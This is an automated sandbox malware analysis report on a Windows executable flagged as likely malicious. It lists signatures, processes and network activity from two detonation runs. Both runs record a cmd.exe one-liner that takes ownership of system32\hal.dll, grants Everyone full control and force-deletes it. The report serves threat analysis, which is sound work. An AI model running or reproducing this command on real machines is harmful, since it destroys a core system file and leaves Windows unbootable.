Malware Analysis Report

2024-11-16 12:57

Sample ID 240807-jjbddavdnn
Target 88aab34a1fc0f5eb595dc14d0888a010N.exe
SHA256 315da1cf9792d9f6d75e8a1c3a36836b65f8497b090d9e596850d49b383a54e6
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

315da1cf9792d9f6d75e8a1c3a36836b65f8497b090d9e596850d49b383a54e6

Threat Level: Likely malicious

The file 88aab34a1fc0f5eb595dc14d0888a010N.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-07 07:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-07 07:41

Reported

2024-08-07 07:43

Platform

win7-20240704-en

Max time kernel

12s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe

"C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\hal.dll && icacls c:\windows\system32\hal.dll /grant Everyone:(F) && del /f c:\windows\system32\hal.dll && exit

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\hal.dll

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\hal.dll /grant Everyone:(F)

Network

N/A

Files

memory/1624-0-0x000000013F670000-0x000000013F80F000-memory.dmp

memory/1624-1-0x000000013F670000-0x000000013F80F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-07 07:41

Reported

2024-08-07 07:43

Platform

win10v2004-20240802-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe

"C:\Users\Admin\AppData\Local\Temp\88aab34a1fc0f5eb595dc14d0888a010N.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\hal.dll && icacls c:\windows\system32\hal.dll /grant Everyone:(F) && del /f c:\windows\system32\hal.dll && exit

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\hal.dll

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\hal.dll /grant Everyone:(F)

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3876-0-0x00007FF6E26C0000-0x00007FF6E285F000-memory.dmp

memory/3876-1-0x00007FF6E26C0000-0x00007FF6E285F000-memory.dmp